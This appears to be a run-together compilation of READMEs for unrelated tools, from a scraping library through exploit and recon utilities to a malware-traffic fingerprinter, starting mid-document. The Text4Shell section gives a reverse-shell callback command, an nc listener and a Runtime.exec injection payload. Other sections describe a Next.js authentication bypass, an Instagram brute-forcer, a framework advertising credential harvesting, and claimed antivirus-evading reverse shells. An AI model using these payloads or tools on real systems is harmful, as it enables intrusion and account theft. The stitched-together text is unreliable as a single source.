>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:

- Get the lxml.etree object itself of any element directly:

  >>> quote._root
  <Element div at 0x107f98870>

- Saving and retrieving elements manually to auto-match them outside the css and xpath methods, but you have to set the identifier yourself.

  To save an element to the database:

  >>> element = page.find_by_text('Tipping the Velvet', first_match=True)
  >>> page.save(element, 'my_special_element')

  To retrieve it later and relocate it in the page:

  >>> element_dict = page.retrieve('my_special_element')
  >>> page.relocate(element_dict, adaptor_type=True)
  [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
  >>> page.relocate(element_dict, adaptor_type=True).css('::text')
  ['Tipping the Velvet']

  If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

  >>> page.relocate(element_dict)
  [<Element a at 0x105a2a7b0>]
Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '54.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
Doing operations on element content is the same as in Scrapy:

quote.re(r'regex_pattern')       # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only
quote.json()                     # If the content text is JSON-able, convert it to JSON using `orjson`, which is ~10x faster than the standard json library and provides more options

except that you can do more with them, like:

quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,       # Ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,   # Set the regex to ignore letter case while compiling it
)

All of these are methods of the TextHandler that contains the text content, so the same can be done directly if you access the .text property or use an equivalent selector function.
Doing operations on the text content itself includes:
- Cleaning the text: quote.clean()
- The results of regex/selector methods are TextHandler objects too, so in cases where you have, for example, a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to a JSON object, in other libraries this would take more than one line of code, but here you can do it in one line: page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
- Sorting all characters in the string as if it were a list and returning the new string: quote.sort(reverse=False)
To be clear, TextHandler is a subclass of Python's str, so all normal operations/methods that work with Python strings will work with it.
Any element's attributes are not exactly a dictionary but a read-only subclass of mapping called AttributesHandler, so it's faster, and the string values returned are actually TextHandler objects, so all the operations above can be done on them, along with standard dictionary operations that don't modify the data, and more :)

>>> for item in element.attrib.search_values('catalogue', partial=True):
...     print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}

>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to make this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
[!IMPORTANT] A dedicated website is still needed to provide detailed library documentation. I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks, but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free, after all.
If you like Scrapling and want it to keep improving, this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling, please read this section before opening an issue.
You need to run the selector at least once with css or xpath with the auto_save parameter set to True before structural changes happen. Now, because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:
1. The URL of the page you selected the element from (or the domain you set with automatch_domain).
2. The identifier parameter you passed to the method while selecting. If you didn't pass one, the selector string itself will be used as an identifier, but remember you will have to use it as the identifier value later when the structure changes and you want to pass the new selector.

Together, both are used to retrieve the element's unique properties from the database later. When you later enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved and Scrapling loops over all elements in the page, compares each one's unique properties to the unique properties we already have for this element, and calculates a score for each one. Comparing elements is not exact; it is more about finding how similar these values are, so everything is taken into consideration, even the values' order, such as the order in which the element's class names were written before and the order in which the same element's class names are written now. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned (a rough illustration of this scoring follows).
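As a rough mental model only (not Scrapling's actual algorithm or weights), the scoring step can be pictured like this:

from difflib import SequenceMatcher

def similarity(saved_props: dict, candidate_props: dict) -> float:
    # Compare each saved property against the candidate's and average the ratios;
    # SequenceMatcher is order-sensitive, which mirrors the point about value order above.
    scores = []
    for key in saved_props:
        a, b = str(saved_props[key]), str(candidate_props.get(key, ""))
        scores.append(SequenceMatcher(None, a, b).ratio())
    return sum(scores) / len(scores)

saved = {"tag": "article", "classes": "product", "text": "Product 1"}
candidate = {"tag": "article", "classes": "product new-class", "text": "Product 1"}
print(round(similarity(saved, candidate), 2))  # the highest-scoring element(s) get returned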
Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also didn't pass the URL parameter for while initializing. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.
For each element, Scrapling will extract:
- the element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only);
- the element's parent tag name, attributes (names and values), and text.
I passed the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message.

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object results in the auto_save/auto_match argument value being ignored. This behavior is purely for performance reasons, so the database only gets created when you are planning to use the auto-matching features.
It could be one of these reasons:
1. No data was saved/stored for this element before.
2. The selector passed is not the one used while storing the element's data. The solution is simple:
   - Pass the old selector again as an identifier to the method called.
   - Retrieve the element with the retrieve method using the old selector as the identifier, then save it again with the save method and the new selector as the identifier.
   - Start using the identifier argument more often if you are planning to use every new selector from now on.
3. The website had some extreme structural changes, like a full redesign. If this happens a lot with this website, the solution is to make your code as selector-free as possible using Scrapling's features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or are within their allowed rules, such as the robots.txt file, for example.
This work is licensed under BSD-3
This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE
with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1¶m2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
- Social media tracking
- Exploitation & Pentesting
- Custom payload generation
- Wireless Attacks
- WPS exploitation
- Web Attacks
- CMS scanning
- Social Engineering
- Credential harvesting
- Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with ❤️ by Letda Kes dr. Sobri
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor
class with interpolation enabled, allowing injection of ${script:...}
expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor
.
Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...}
interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell payload is sent via the data parameter using a POST request (a sketch of the full request follows).
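A minimal sketch of the request this PoC builds; the request path, the vulnerable parameter name, and the payload wrapping are assumptions that vary per target, as noted above:

import requests

target = "http://127.0.0.1:8080"          # illustrative target
cmd = "nc -e /bin/sh 192.168.1.2 4444"    # example reverse-shell command
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}"

# The vulnerable parameter is assumed to be `data` here; adapt path/parameter to the target app.
resp = requests.post(target, data={"data": payload}, timeout=10)
print(resp.status_code)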
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.
Next.js versions affected: 11.1.4 and up.
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
- <url>: Base URL of the Next.js site (e.g., https://example.com)
- <path>: Protected path to test (default: /admin)
- <show_headers>: Show response headers (default: False)

Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
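Under the hood, the check boils down to a comparison like this (a simplified sketch, not the script's exact code; the header value shown is one commonly cited bypass payload and may need adjusting per target):

import requests

url, path = "https://example.com", "/admin"
baseline = requests.get(url + path, allow_redirects=False)
bypass = requests.get(
    url + path,
    headers={"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"},
    allow_redirects=False,
)
# If the protected path is normally blocked (e.g. 307/401/403) but returns 200 with the
# header set, the middleware was skipped and the target is likely vulnerable.
print(baseline.status_code, "->", bypass.status_code)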
MIT License
Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open-source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.
With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.
⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.
You can use the online version here: TruffleHog Explorer
$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer
Open index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

Then load your .json files from the TruffleHog output.

Happy Securing!
This project is a command-line tool and Python library that uses the Wappalyzer extension (and its fingerprints) to detect technologies. Other projects that emerged after the discontinuation of the official open-source project use outdated fingerprints and lack accuracy when used on dynamic web apps; this project bypasses those limitations.
Before installing wappalyzer, you will need to install Firefox and geckodriver. Below are detailed steps for setting up geckodriver, but you may use Google/YouTube for help.
geckodriver-vX.XX.X-win64.zip
geckodriver-vX.XX.X-macos.tar.gz
geckodriver-vX.XX.X-linux64.tar.gz
To ensure Selenium can locate the GeckoDriver executable:

Windows:
1. Move geckodriver.exe to a directory (e.g., C:\WebDrivers\).
2. Add this directory to the system's PATH:
   - Open Environment Variables.
   - Under System Variables, find and select the Path variable, then click Edit.
   - Click New and enter the directory path where geckodriver.exe is stored.
   - Click OK to save.

macOS/Linux:
1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH.
2. Use the following command in the terminal:

   sudo mv geckodriver /usr/local/bin/

   Ensure /usr/local/bin/ is in your PATH.
pipx install wappalyzer
To use it as a library, install it with pip inside an isolated environment, e.g. venv or docker. You may also use --break-system-packages to do a 'regular' install, but it is not recommended.
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
docker compose up -d
To scan URLs using the Docker container:
Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
Scan a URL and save the results as JSON:

docker compose run --rm wappalyzer -i https://example.com -oJ output.json
Some common usage examples are given below, refer to list of all options for more information.
wappalyzer -i https://example.com
wappalyzer -i urls.txt -t 10
wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
wappalyzer -i https://example.com -oJ results.json
Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.
- -i: Input URL or file containing URLs (one per line)
- --scan-type: Scan type (default: 'full')
  - fast: Quick HTTP-based scan (sends 1 request)
  - balanced: HTTP-based scan with more requests
  - full: Complete scan using the wappalyzer extension
- -t, --threads: Number of concurrent threads (default: 5)
- -oJ: JSON output file path
- -oC: CSV output file path
- -oH: HTML output file path
- -c, --cookie: Cookie header string for authenticated scans

The Python library is available on PyPI as wappalyzer and can be imported with the same name.
The main function you'll interact with is analyze():
from wappalyzer import analyze
# Basic usage
results = analyze('https://example.com')
# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)
- url (str): The URL to analyze
- scan_type (str, optional): Type of scan to perform
  - 'fast': Quick HTTP-based scan
  - 'balanced': HTTP-based scan with more requests
  - 'full': Complete scan including JavaScript execution (default)
- threads (int, optional): Number of threads for parallel processing (default: 3)
- cookie (str, optional): Cookie header string for authenticated scans

Returns a dictionary with the URL as key and detected technologies as value:
{
  "https://github.com": {
    "Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
    "lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
    "React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]}
  },
  "https://google.com": {},
  "https://example.com": {}
}
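For instance, a small snippet that walks this return structure and prints one line per detected technology might look like this (a sketch built only on the documented `analyze()` return format; the URL is a placeholder):

```python
from wappalyzer import analyze

# Detected technologies are keyed by URL; each technology maps to its details.
results = analyze('https://example.com', scan_type='fast')

for url, technologies in results.items():
    if not technologies:
        print(f"{url}: no technologies detected")
        continue
    for name, details in technologies.items():
        version = details.get("version") or "unknown version"
        categories = ", ".join(details.get("categories", []))
        print(f"{url}: {name} ({version}) [{categories}]")
```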
Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.
Instagram Brute Force CPU/GPU Supported 2024
(Use option 2 while running the script.)
(Option 1 is under development.)
(Chrome must be installed on the device.)
Compatible and Tested (GUI Supported Operating Systems Only)
Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher
Install Requirements
pip install -r requirements.txt
How to run
python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161
The following languages are wholly ignored by AV vendors, including MS-Defender:
- tcl
- php
- crystal
- julia
- golang
- dart
- dlang
- vlang
- nodejs
- bun
- python
- fsharp
- deno
All of these languages were allowed to completely execute, and establish a reverse shell by MS-Defender. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.
The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:
And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:
With this in mind, and given the absolute shortcomings in identifying PHP-based malware, we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, Sentinel1, Palo Alto, Fortinet, etc. We have been able to identify that, at the very least, Defender considers these obviously malicious payloads to be plain text.
We as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes, and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.
In case you are seeing all of the default declarations and wondering what is going on: there is a reason. This was built to be more modular for later versions. For now, enjoy the tool and feel free to post issues; they'll be addressed as quickly as possible.
ModTracer finds hidden Linux kernel rootkits and then makes them visible again.
Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/Imperius
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
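Conceptually, that inspection step is a set of regular expressions run over the extracted image content. The snippet below is an illustrative sketch only; the pattern names and patterns are examples, not DockerSpy's actual rule set, which lives in its configuration files:

```python
import re

# Example patterns; DockerSpy's real patterns are defined in its configuration.
SECRET_PATTERNS = {
    "AWS Access Key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Private key header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "Generic API key": re.compile(r"(?i)api[_-]?key['\"]?\s*[:=]\s*['\"][0-9a-z]{16,}['\"]"),
}

def scan_text(text: str):
    """Yield (pattern_name, matched_value) pairs found in a blob of image content."""
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            yield name, match.group(0)

if __name__ == "__main__":
    sample = 'ENV AWS_KEY=AKIAABCDEFGHIJKLMNOP\napi_key = "0123456789abcdef0123"'
    for name, value in scan_text(sample):
        print(f"[{name}] {value}")
```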
To use DockerSpy, follow these steps:
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
dockerspy
To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Consider following me:
Special thanks to @akaclandestine
Reconnaissance is the first phase of penetration testing, which means gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and the wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt
A detailed usage guide is available in the Usage section of the Wiki, but an index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)
Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.
Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.
An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.
The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.
After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include:
* Request method
* Protocol version
* Header order
* Popular headers' values
* Payload length, entropy, and presence of non-ASCII characters
Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.
The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.
Minimum requirements needed before installation:
* `Python` >= 3.3
* `Tshark` >= 2.2.0
Installation available from PyPI:
pip install hfinger
Hfinger has been tested on Xubuntu 22.04 LTS with the `tshark` package in version `3.6.2`, but should work with older versions like `2.6.10` on Xubuntu 18.04 or `3.2.3` on Xubuntu 20.04.
Please note that, as with any PoC, you should run Hfinger in a separate environment, at least within a Python virtual environment. Its setup is not covered here, but you can try this tutorial.
After installation, you can call the tool directly from the command line with `hfinger` or as a Python module with `python -m hfinger`.
For example:
foo@bar:~$ hfinger -f /tmp/test.pcap
[{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]
Help can be displayed with the short `-h` or long `--help` switch:
usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
[-l LOGFILE]
Hfinger - fingerprinting malware HTTP requests stored in pcap files
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Read a single pcap file
-d DIR, --directory DIR
Read pcap files from the directory DIR
-o output_path, --output-path output_path
Path to the output directory
-m {0,1,2,3,4}, --mode {0,1,2,3,4}
Fingerprint report mode.
0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
2 - optimal (the default mode),
3 - the lowest number of generated fingerprints, but the highest number of collisions,
4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
-v, --verbose Report information about non-standard values in the request
(e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
Without --logfile (-l) will print to the standard error.
-l LOGFILE, --logfile LOGFILE
Output logfile in the verbose mode. Implies -v or --verbose switch.
You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:
hfinger -f example.pcap -o /tmp/pcap
will be saved to:
/tmp/pcap/example.pcap.json
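Because the output is plain JSON, the saved file can be post-processed directly. As a small sketch (assuming the `/tmp/pcap/example.pcap.json` file produced above and the field names shown in the example output), requests can be grouped by fingerprint like this:

```python
import json
from collections import defaultdict

# Load the JSON report written by hfinger (a list of dicts, one per request).
with open("/tmp/pcap/example.pcap.json") as f:
    records = json.load(f)

by_fingerprint = defaultdict(list)
for record in records:
    by_fingerprint[record["fingerprint"]].append(
        (record["ip_src"], record["ip_dst"], record["port_dst"])
    )

for fingerprint, endpoints in by_fingerprint.items():
    print(f"{fingerprint} -> {len(endpoints)} request(s)")
```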
The report mode `-m`/`--mode` can be used to change the default report mode by providing an integer in the range `0`-`4`. The modes differ in the represented request features or rounding modes. The default mode (`2`) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers a low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode `3` you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.
Beginning with version `0.2.1`, Hfinger is less verbose. You should use `-v`/`--verbose` if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (`\r\n\r\n`), and other problems with analyzed requests that are not application errors. When any such issues are encountered in verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the `-l`/`--logfile` switch (it implies `-v`/`--verbose`). The log data will be appended to the log file.
Beginning with version `0.2.0`, Hfinger supports importing into other Python applications. To use it in your app, simply import the `hfinger_analyze` function from `hfinger.analysis` and call it with a path to the pcap file and the reporting mode. The returned result is a list of dicts with fingerprinting results.
For example:
from hfinger.analysis import hfinger_analyze
pcap_path = "SPECIFY_PCAP_PATH_HERE"
reporting_mode = 4
